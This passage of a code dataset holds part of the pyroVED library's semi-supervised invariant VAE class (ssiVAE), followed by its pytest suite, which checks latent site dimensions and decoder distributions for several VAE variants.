For 2D systems, `r` enforces\n rotational invariance, `t` enforces invariance to\n translations, `sc` enforces a scale invariance, and\n invariances=None corresponds to vanilla VAE.\n For 1D systems, 't' enforces translational invariance and\n invariances=None is vanilla VAE\n hidden_dim_e:\n Number of hidden units per each layer in encoder (inference network).\n hidden_dim_d:\n Number of hidden units per each layer in decoder (generator network).\n hidden_dim_cls:\n Number of hidden units (\"neurons\") in each layer of classifier\n num_layers_e:\n Number of layers in encoder (inference network).\n num_layers_d:\n Number of layers in decoder (generator network).\n num_layers_cls:\n Number of layers in classifier\n activation:\n Non-linear activation for inner layers of both encoder and the decoder.\n The available activations are ReLU ('relu'), leaky ReLU ('lrelu'),\n hyberbolic tangent ('tanh'), softplus ('softplus'), and GELU ('gelu').\n (The default is \"tanh\").\n sampler_d:\n Decoder sampler, as defined as p(x|z) = sampler(decoder(z)).\n The available samplers are 'bernoulli', 'continuous_bernoulli',\n and 'gaussian' (Default: 'bernoulli').\n sigmoid_d:\n Sigmoid activation for the decoder output (Default: True)\n seed:\n Seed used in torch.manual_seed(seed) and\n torch.cuda.manual_seed_all(seed)\n\n Keyword Args:\n device:\n Sets device to which model and data will be moved.\n Defaults to 'cuda:0' if a GPU is available and to CPU otherwise.\n dx_prior:\n Translational prior in x direction (float between 0 and 1)\n dy_prior:\n Translational prior in y direction (float between 0 and 1)\n sc_prior:\n Scale prior (usually, sc_prior << 1)\n decoder_sig:\n Sets sigma for a \"gaussian\" decoder sampler\n\n Examples:\n\n Initialize a VAE model with rotational invariance for\n semi-supervised learning of the dataset that has 10 classes\n\n >>> data_dim = (28, 28)\n >>> ssvae = ssiVAE(data_dim, latent_dim=2, num_classes=10, invariances=['r'])\n \"\"\"\n def 
__init__(self,\n data_dim: Tuple[int],\n latent_dim: int,\n num_classes: int,\n invariances: List[str] = None,\n hidden_dim_e: int = 128,\n hidden_dim_d: int = 128,\n hidden_dim_cls: int = 128,\n num_layers_e: int = 2,\n num_layers_d: int = 2,\n num_layers_cls: int = 2,\n activation: str = \"tanh\",\n sampler_d: str = \"bernoulli\",\n sigmoid_d: bool = True,\n seed: int = 1,\n **kwargs: Union[str, float]\n ) -> None:\n \"\"\"\n Initializes ss-iVAE parameters\n \"\"\"\n args = (data_dim, invariances)\n super(ssiVAE, self).__init__(*args, **kwargs)\n pyro.clear_param_store()\n set_deterministic_mode(seed)\n\n self.data_dim = data_dim\n\n # Initialize z-Encoder neural network\n self.encoder_z = fcEncoderNet(\n data_dim, latent_dim+self.coord, num_classes,\n hidden_dim_e, num_layers_e, activation, flat=False)\n\n # Initialize y-Encoder neural network\n self.encoder_y = fcClassifierNet(\n data_dim, num_classes, hidden_dim_cls, num_layers_cls,\n activation)\n\n # Initializes Decoder neural network\n dnet = sDecoderNet if 0 < self.coord < 5 else fcDecoderNet\n self.decoder = dnet(\n data_dim, latent_dim, num_classes, hidden_dim_d,\n num_layers_d, activation, sigmoid_out=sigmoid_d,\n unflat=False)\n self.sampler_d = get_sampler(sampler_d, **kwargs)\n\n # Sets continuous and discrete dimensions\n self.z_dim = latent_dim + self.coord\n self.num_classes = num_classes\n\n # Send model parameters to their appropriate devices.\n self.to(self.device)\n\n def model(self,\n xs: torch.Tensor,\n ys: Optional[torch.Tensor] = None,\n **kwargs: float) -> None:\n \"\"\"\n Model of the generative process p(x|z,y)p(y)p(z)\n \"\"\"\n pyro.module(\"ss_vae\", self)\n batch_dim = xs.size(0)\n specs = dict(dtype=xs.dtype, device=xs.device)\n beta = kwargs.get(\"scale_factor\", 1.)\n # pyro.plate enforces independence between variables in batches xs, ys\n with pyro.plate(\"data\"):\n # sample the latent vector from the constant prior distribution\n prior_loc = torch.zeros(batch_dim, self.z_dim, 
**specs)\n prior_scale = torch.ones(batch_dim, self.z_dim, **specs)\n with pyro.poutine.scale(scale=beta):\n zs = pyro.sample(\n \"z\", dist.Normal(prior_loc, prior_scale).to_event(1))\n # split latent variable into parts for rotation and/or translation\n # and image content\n if self.coord > 0:\n phi, dx, sc, zs = self.split_latent(zs)\n if 't' in self.invariances:\n dx = (dx * self.t_prior).unsqueeze(1)\n # transform coordinate grid\n if 'r' in self.invariances:\n expdim = phi.shape[0]\n elif 't' in self.invariances:\n expdim = dx.shape[0]\n elif 's' in self.invariances:\n expdim = sc.shape[0]\n grid = self.grid.expand(expdim, *self.grid.shape)\n x_coord_prime = transform_coordinates(grid, phi, dx, sc)\n # sample label from the constant prior or observe the value\n alpha_prior = (torch.ones(batch_dim, self.num_classes, **specs) /\n self.num_classes)\n ys = pyro.sample(\"y\", dist.OneHotCategorical(alpha_prior), obs=ys)\n # Score against the parametrized distribution\n # p(x|y,z) = bernoulli(decoder(y,z))\n d_args = (x_coord_prime, [zs, ys]) if self.coord else ([zs, ys],)\n loc = self.decoder(*d_args)\n loc = loc.view(*ys.shape[:-1], -1)\n pyro.sample(\"x\", self.sampler_d(loc).to_event(1), obs=xs)\n\n def guide(self, xs: torch.Tensor,\n ys: Optional[torch.Tensor] = None,\n **kwargs: float) -> None:\n \"\"\"\n Guide q(z|y,x)q(y|x)\n \"\"\"\n beta = kwargs.get(\"scale_factor\", 1.)\n with pyro.plate(\"data\"):\n # sample and score the digit with the variational distribution\n # q(y|x) = categorical(alpha(x))\n if ys is None:\n alpha = self.encoder_y(xs)\n ys = pyro.sample(\"y\", dist.OneHotCategorical(alpha))\n # sample (and score) the latent vector with the variational\n # distribution q(z|x,y) = normal(loc(x,y),scale(x,y))\n loc, scale = self.encoder_z([xs, ys])\n with pyro.poutine.scale(scale=beta):\n pyro.sample(\"z\", dist.Normal(loc, scale).to_event(1))\n\n def split_latent(self, zs: torch.Tensor) -> Tuple[torch.Tensor]:\n \"\"\"\n Split latent variable into 
parts with rotation and/or translation\n and image content\n \"\"\"\n zdims = list(zs.shape)\n zdims[-1] = zdims[-1] - self.coord\n zs = zs.view(-1, zs.size(-1))\n # For 1D, there is only translation\n phi, dx, sc, zs = self._split_latent(zs)\n return phi, dx, sc, zs.view(*zdims)\n\n def model_aux(self, xs: torch.Tensor,\n ys: Optional[torch.Tensor] = None,\n **kwargs: float) -> None:\n \"\"\"\n Models an auxiliary (supervised) loss\n \"\"\"\n pyro.module(\"ss_vae\", self)\n with pyro.plate(\"data\"):\n # the extra term to yield an auxiliary loss\n aux_loss_multiplier = kwargs.get(\"aux_loss_multiplier\", 20)\n if ys is not None:\n alpha = self.encoder_y.forward(xs)\n with pyro.poutine.scale(scale=aux_loss_multiplier):\n pyro.sample(\"y_aux\", dist.OneHotCategorical(alpha), obs=ys)\n\n def guide_aux(self, xs, ys=None, **kwargs):\n \"\"\"\n Dummy guide function to accompany model_classify\n \"\"\"\n pass\n\n def set_classifier(self, cls_net: Type[torch.nn.Module]) -> None:\n \"\"\"\n Sets a user-defined classification network\n \"\"\"\n self.encoder_y = cls_net\n\n def classifier(self,\n x_new: torch.Tensor,\n **kwargs: int) -> torch.Tensor:\n \"\"\"\n Classifies data\n\n Args:\n x_new:\n Data to classify with a trained ss-iVAE. 
The new data must have\n the same dimensions (images height x width or spectra length)\n as the one used for training.\n kwargs:\n Batch size as 'batch_size' (for encoding large volumes of data)\n \"\"\"\n def classify(x_i) -> torch.Tensor:\n with torch.no_grad():\n alpha = self.encoder_y(x_i)\n _, predicted = torch.max(alpha.data, 1)\n return predicted.cpu()\n\n x_new = init_dataloader(x_new, shuffle=False, **kwargs)\n y_predicted = []\n for (x_i,) in x_new:\n y_predicted.append(classify(x_i.to(self.device)))\n return torch.cat(y_predicted)\n\n def encode(self,\n x_new: torch.Tensor,\n y: Optional[torch.Tensor] = None,\n **kwargs: int) -> torch.Tensor:\n \"\"\"\n Encodes data using a trained inference (encoder) network\n\n Args:\n x_new:\n Data to encode with a trained iVAE. The new data must have\n the same dimensions (images height and width or spectra length)\n as the one used for training.\n y:\n Classes as one-hot vectors for each sample in x_new. If not provided,\n the ss-iVAE's classifier will be used to predict the classes.\n kwargs:\n Batch size as 'batch_size' (for encoding large volumes of data)\n \"\"\"\n if y is None:\n y = self.classifier(x_new, **kwargs)\n if y.ndim < 2:\n y = to_onehot(y, self.num_classes)\n z = self._encode(x_new, y, **kwargs)\n z_loc, z_scale = z.split(self.z_dim, 1)\n _, y_pred = torch.max(y, 1)\n return z_loc, z_scale, y_pred\n\n def decode(self, z: torch.Tensor, y: torch.Tensor, **kwargs: int) -> torch.Tensor:\n \"\"\"\n Decodes a batch of latent coordinates\n\n Args:\n z: Latent coordinates (without rotational and translational parts)\n y: Classes as one-hot vectors for each sample in z\n kwargs: Batch size as 'batch_size'\n \"\"\"\n z = torch.cat([z.to(self.device), y.to(self.device)], -1)\n loc = self._decode(z, **kwargs)\n return loc.view(-1, *self.data_dim)\n\n def manifold2d(self, d: int, plot: bool = True,\n **kwargs: Union[str, int, float]) -> torch.Tensor:\n \"\"\"\n Returns a learned latent manifold in the image 
space\n\n Args:\n d: Grid size\n plot: Plots the generated manifold (Default: True)\n kwargs: Keyword arguments include 'label' for class label (if any),\n custom min/max values for grid boundaries passed as 'z_coord'\n (e.g. z_coord = [-3, 3, -3, 3]), 'angle' and 'shift' to\n condition a generative model one, and plot parameters\n ('padding', 'padding_value', 'cmap', 'origin', 'ylim')\n \"\"\"\n z, (grid_x, grid_y) = generate_latent_grid(d, **kwargs)\n cls = tt(kwargs.get(\"label\", 0))\n if cls.ndim < 2:\n cls = to_onehot(cls.unsqueeze(0), self.num_classes)\n cls = cls.repeat(z.shape[0], 1)\n loc = self.decode(z, cls, **kwargs)\n if plot:\n if self.ndim == 2:\n plot_img_grid(\n loc, d,\n extent=[grid_x.min(), grid_x.max(), grid_y.min(), grid_y.max()],\n **kwargs)\n elif self.ndim == 1:\n plot_spect_grid(loc, d, **kwargs)\n return loc\n\n def manifold_traversal(self, d: int, cont_idx: int, cont_idx_fixed: int = 0,\n plot: bool = True, **kwargs: Union[str, int, float]\n ) -> torch.Tensor:\n \"\"\"\n Latent space traversal for continuous and discrete latent variables\n\n Args:\n d: Grid size\n cont_idx:\n Continuous latent variable used for plotting\n a latent manifold traversal\n cont_idx_fixed:\n Value which the remaining continuous latent variables are fixed at\n plot:\n Plots the generated manifold (Default: True)\n kwargs:\n Keyword arguments include custom min/max values for grid\n boundaries passed as 'z_coord' (e.g. 
z_coord = [-3, 3, -3, 3]),\n 'angle' and 'shift' to condition a generative model one,\n and plot parameters ('padding', 'padding_value', 'cmap', 'origin', 'ylim')\n \"\"\"\n num_samples = d**2\n disc_dim = self.num_classes\n cont_dim = self.z_dim - self.coord\n data_dim = self.data_dim\n # Get continuous and discrete latent coordinates\n samples_cont, samples_disc = generate_latent_grid_traversal(\n d, cont_dim, disc_dim, cont_idx, cont_idx_fixed, num_samples)\n # Pass discrete and continuous latent coordinates through a decoder\n decoded = self.decode(samples_cont, samples_disc, **kwargs)\n if plot:\n plot_grid_traversal(decoded, d, data_dim, disc_dim, **kwargs)\n return decoded\n" }, { "alpha_fraction": 0.5808394551277161, "alphanum_fraction": 0.6026319861412048, "avg_line_length": 39.348297119140625, "blob_id": "d6a6b47402b434fbe1077899c08cbd848cfe75f9", "content_id": "4c3f24bf8f375c106aabf463dbf541db560593ee", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 26064, "license_type": "permissive", "max_line_length": 95, "num_lines": 646, "path": "/tests/test_models.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "import sys\nfrom copy import deepcopy as dc\n\nimport torch\nimport pyro\nimport pyro.poutine as poutine\nimport pyro.distributions as dist\nimport pyro.infer as infer\nfrom pyro.poutine.enum_messenger import EnumMessenger\nimport pytest\nfrom numpy.testing import assert_equal, assert_\nfrom numpy import array_equal\n\nsys.path.append(\"../../\")\n\nfrom pyroved import models, nets, utils\n\ntt = torch.tensor\n\n\ndef get_traces(model, *args):\n guide_trace = pyro.poutine.trace(model.guide).get_trace(*args)\n model_trace = pyro.poutine.trace(\n pyro.poutine.replay(model.model, trace=guide_trace)).get_trace(*args)\n return guide_trace, model_trace\n\n\ndef get_enum_traces(model, x):\n guide_enum = EnumMessenger(first_available_dim=-2)\n model_enum = 
EnumMessenger()\n guide_ = guide_enum(\n infer.config_enumerate(model.guide, \"parallel\", expand=True))\n model_ = model_enum(model.model)\n guide_trace = poutine.trace(guide_, graph_type=\"flat\").get_trace(x)\n model_trace = poutine.trace(\n pyro.poutine.replay(model_, trace=guide_trace),\n graph_type=\"flat\").get_trace(x)\n return guide_trace, model_trace\n\n\ndef assert_weights_equal(m1, m2):\n eq_w = []\n for p1, p2 in zip(m1.values(), m2.values()):\n eq_w.append(array_equal(\n p1.detach().cpu().numpy(),\n p2.detach().cpu().numpy()))\n return all(eq_w)\n\n\[email protected](\n \"invariances, coord_exp\", [(None, 0), (['t'], 1)])\ndef test_base_vae_1d(invariances, coord_exp):\n data_dim = (8,)\n m = models.base.baseVAE(data_dim, invariances)\n assert_equal(m.coord, coord_exp)\n\n\[email protected](\n \"invariances, coord_exp\",\n [(None, 0), (['r'], 1), (['t'], 2), (['s'], 1), (['r', 's', 't'], 4)])\ndef test_base_vae_2d(invariances, coord_exp):\n data_dim = (8, 8)\n m = models.base.baseVAE(data_dim, invariances)\n assert_equal(m.coord, coord_exp)\n\n\[email protected](\"invariances\", [['r'], ['s'], ['r', 't']])\ndef test_base_vae_1d_exception(invariances):\n data_dim = (8,)\n with pytest.raises(ValueError) as context:\n _ = models.base.baseVAE(data_dim, invariances)\n assert_(\"For 1D data, the only invariance to enforce is translation\"\n in str(context.exception))\n\n\ndef test_base_vae_split_latent_1d():\n z = torch.randn(5, 3)\n m = models.base.baseVAE((8,), ['t'])\n phi, dx, sc, z = m._split_latent(z)\n assert_(phi is None)\n assert_(sc is None)\n assert_(isinstance(dx, torch.Tensor))\n assert_equal(dx.shape, (5, 1))\n assert_(abs(dx).sum() > 0)\n assert_(isinstance(z, torch.Tensor))\n assert_equal(z.shape, (5, 2))\n\n\ndef test_base_vae_split_latent_2d():\n z = torch.randn(5, 6)\n m = models.base.baseVAE((8, 8), ['r', 't', 's'])\n z_split = m._split_latent(z)\n assert_(all([isinstance(z_, torch.Tensor) for z_ in z_split]))\n assert_(z_split[0].shape, 
(5, 1))\n assert_(z_split[1].shape, (5, 2))\n assert_(z_split[2].shape, (5, 1))\n assert_(z_split[3].shape, (5, 1))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_trvae_sites_dims_2d(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(*data_dim)\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.iVAE(data_dim[1:], invariances=invariances)\n guide_trace, model_trace = get_traces(model, x)\n assert_equal(model_trace.nodes[\"latent\"]['value'].shape,\n (data_dim[0], coord+2))\n assert_equal(guide_trace.nodes[\"latent\"]['value'].shape,\n (data_dim[0], coord+2))\n assert_equal(model_trace.nodes[\"obs\"]['value'].shape,\n (data_dim[0], torch.prod(tt(data_dim[1:])).item()))\n\n\[email protected](\"invariances\", [None, ['t']])\ndef test_trvae_sites_dims_1d(invariances):\n data_dim = (3, 8)\n x = torch.randn(*data_dim)\n coord = 0 if invariances is None else len(invariances)\n model = models.iVAE(data_dim[1:], invariances=invariances)\n guide_trace, model_trace = get_traces(model, x)\n assert_equal(model_trace.nodes[\"latent\"]['value'].shape,\n (data_dim[0], coord+2))\n assert_equal(guide_trace.nodes[\"latent\"]['value'].shape,\n (data_dim[0], coord+2))\n assert_equal(model_trace.nodes[\"obs\"]['value'].shape,\n (data_dim[0], torch.prod(tt(data_dim[1:])).item()))\n\n\[email protected](\"invariances\", [None, ['t']])\[email protected](\"data_dim\", [(3, 8, 8), (3, 8)])\ndef test_trvae_sites_fn(data_dim, invariances):\n x = torch.randn(*data_dim)\n model = models.iVAE(data_dim[1:], invariances=invariances)\n guide_trace, model_trace = get_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"latent\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(guide_trace.nodes[\"latent\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(model_trace.nodes[\"obs\"]['fn'].base_dist, dist.Bernoulli))\n\n\[email 
protected](\"input_dim, output_dim\",\n [((8,), (8, 8)), ((8, 8), (8,)),\n ((8,), (8,)), ((8, 8), (8, 8))])\ndef test_ved_sites_dims(input_dim, output_dim):\n x = torch.randn(2, 1, *input_dim)\n y = torch.randn(2, 1, *output_dim)\n model = models.VED(input_dim, output_dim)\n guide_trace, model_trace = get_traces(model, x, y)\n assert_equal(model_trace.nodes[\"z\"]['value'].shape,\n (x.shape[0], 2))\n assert_equal(guide_trace.nodes[\"z\"]['value'].shape,\n (x.shape[0], 2))\n assert_equal(model_trace.nodes[\"obs\"]['value'].shape,\n (y.shape[0], torch.prod(tt(output_dim)).item()))\n\n\[email protected](\"input_dim, output_dim\",\n [((8,), (8, 8)), ((8, 8), (8,)),\n ((8,), (8,)), ((8, 8), (8, 8))])\ndef test_ved_sites_fn(input_dim, output_dim):\n x = torch.randn(2, 1, *input_dim)\n y = torch.randn(2, 1, *output_dim)\n model = models.VED(input_dim, output_dim)\n guide_trace, model_trace = get_traces(model, x, y)\n assert_(isinstance(model_trace.nodes[\"z\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(guide_trace.nodes[\"z\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(model_trace.nodes[\"obs\"]['fn'].base_dist, dist.Bernoulli))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_jtrvae_cont_sites_dims_2d(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(*data_dim)\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.jiVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_enum_traces(model, x)\n assert_equal(model_trace.nodes[\"latent_cont\"]['value'].shape,\n (data_dim[0], coord+2))\n assert_equal(guide_trace.nodes[\"latent_cont\"]['value'].shape,\n (data_dim[0], coord+2))\n assert_equal(model_trace.nodes[\"obs\"]['value'].shape,\n (data_dim[0], torch.prod(tt(data_dim[1:])).item()))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 
'r', 't']])\ndef test_jtrvae_disc_sites_dims(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(*data_dim)\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.jiVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_enum_traces(model, x)\n assert_equal(model_trace.nodes[\"latent_disc\"]['value'].shape,\n (3, data_dim[0], 3))\n assert_equal(guide_trace.nodes[\"latent_disc\"]['value'].shape,\n (3, data_dim[0], 3))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_jtrvae_cont_sites_fn(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(*data_dim)\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.jiVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_enum_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"latent_cont\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(guide_trace.nodes[\"latent_cont\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(model_trace.nodes[\"obs\"]['fn'].base_dist, dist.Bernoulli))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_jtrvae_disc_sites_fn(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(*data_dim)\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.jiVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_enum_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"latent_disc\"]['fn'], dist.OneHotCategorical))\n assert_(isinstance(guide_trace.nodes[\"latent_disc\"]['fn'], dist.OneHotCategorical))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef 
test_sstrvae_cont_sites_dims(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.ssiVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_enum_traces(model, x)\n assert_equal(model_trace.nodes[\"z\"]['value'].shape,\n (3, data_dim[0], coord+2))\n assert_equal(guide_trace.nodes[\"z\"]['value'].shape,\n (3, data_dim[0], coord+2))\n assert_equal(model_trace.nodes[\"x\"]['value'].shape,\n (data_dim[0], torch.prod(tt(data_dim[1:])).item()))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_sstrvae_disc_sites_dims(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.ssiVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_enum_traces(model, x)\n assert_equal(model_trace.nodes[\"y\"]['value'].shape,\n (3, data_dim[0], 3))\n assert_equal(guide_trace.nodes[\"y\"]['value'].shape,\n (3, data_dim[0], 3))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_sstrvae_cont_sites_fn(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.ssiVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_enum_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"z\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(guide_trace.nodes[\"z\"]['fn'].base_dist, dist.Normal))\n 
assert_(isinstance(model_trace.nodes[\"x\"]['fn'].base_dist, dist.Bernoulli))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_sstrvae_disc_sites_fn(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.ssiVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_enum_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"y\"]['fn'], dist.OneHotCategorical))\n assert_(isinstance(guide_trace.nodes[\"y\"]['fn'], dist.OneHotCategorical))\n\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_ssregvae_cont_sites_dims(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.ss_reg_iVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_traces(model, x)\n assert_equal(model_trace.nodes[\"z\"]['value'].shape,\n (data_dim[0], coord+2))\n assert_equal(guide_trace.nodes[\"z\"]['value'].shape,\n (data_dim[0], coord+2))\n assert_equal(model_trace.nodes[\"x\"]['value'].shape,\n (data_dim[0], torch.prod(tt(data_dim[1:])).item()))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_ssregvae_disc_sites_dims(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.ss_reg_iVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = 
get_traces(model, x)\n assert_equal(model_trace.nodes[\"y\"]['value'].shape,\n (data_dim[0], 3))\n assert_equal(guide_trace.nodes[\"y\"]['value'].shape,\n (data_dim[0], 3))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_ssregvae_vae_sites_fn(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.ss_reg_iVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"z\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(guide_trace.nodes[\"z\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(model_trace.nodes[\"x\"]['fn'].base_dist, dist.Bernoulli))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_ssregvae_reg_sites_fn(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.ss_reg_iVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"y\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(guide_trace.nodes[\"y\"]['fn'].base_dist, dist.Normal))\n\n\[email protected](\n \"sampler, expected_dist\",\n [(\"gaussian\", dist.Normal), (\"bernoulli\", dist.Bernoulli),\n (\"continuous_bernoulli\", dist.ContinuousBernoulli)])\ndef test_trvae_decoder_sampler(sampler, expected_dist):\n data_dim = (2, 8, 8)\n x = torch.randn(*data_dim)\n model = models.iVAE(data_dim[1:], coord=1, sampler_d=sampler)\n _, model_trace = get_traces(model, x)\n 
assert_(isinstance(model_trace.nodes[\"obs\"]['fn'].base_dist, expected_dist))\n\n\[email protected](\n \"sampler, expected_dist\",\n [(\"gaussian\", dist.Normal), (\"bernoulli\", dist.Bernoulli),\n (\"continuous_bernoulli\", dist.ContinuousBernoulli)])\ndef test_ved_decoder_sampler(sampler, expected_dist):\n input_dim = (8, 8)\n output_dim = (8,)\n x = torch.randn(2, 1, *input_dim)\n y = torch.randn(2, 1, *output_dim)\n model = models.VED(input_dim, output_dim, sampler_d=sampler)\n _, model_trace = get_traces(model, x, y)\n assert_(isinstance(model_trace.nodes[\"obs\"]['fn'].base_dist, expected_dist))\n\n\[email protected](\n \"sampler, expected_dist\",\n [(\"gaussian\", dist.Normal), (\"bernoulli\", dist.Bernoulli),\n (\"continuous_bernoulli\", dist.ContinuousBernoulli)])\ndef test_jtrvae_decoder_sampler(sampler, expected_dist):\n data_dim = (2, 8, 8)\n x = torch.randn(*data_dim)\n model = models.jiVAE(data_dim[1:], 2, 3, coord=1, sampler_d=sampler)\n _, model_trace = get_enum_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"obs\"]['fn'].base_dist, expected_dist))\n\n\[email protected](\n \"sampler, expected_dist\",\n [(\"gaussian\", dist.Normal), (\"bernoulli\", dist.Bernoulli),\n (\"continuous_bernoulli\", dist.ContinuousBernoulli)])\ndef test_sstrvae_decoder_sampler(sampler, expected_dist):\n data_dim = (2, 64)\n x = torch.randn(*data_dim)\n model = models.ssiVAE(data_dim[1:], 2, 3, coord=1, sampler_d=sampler)\n _, model_trace = get_enum_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"x\"]['fn'].base_dist, expected_dist))\n\n\[email protected](\"data_dim\", [(2, 8), (2, 8, 8), (3, 8), (3, 8, 8)])\ndef test_basevae_encode_x(data_dim):\n x = torch.randn(*data_dim)\n vae = models.base.baseVAE(data_dim[1:], None)\n encoder_net = nets.fcEncoderNet(data_dim[1:], 2, 0)\n vae.set_encoder(encoder_net)\n encoded = vae._encode(x)\n assert_equal(encoded[:, :2].shape, (data_dim[0], 2))\n assert_equal(encoded[:, 2:].shape, (data_dim[0], 2))\n\n\ndef 
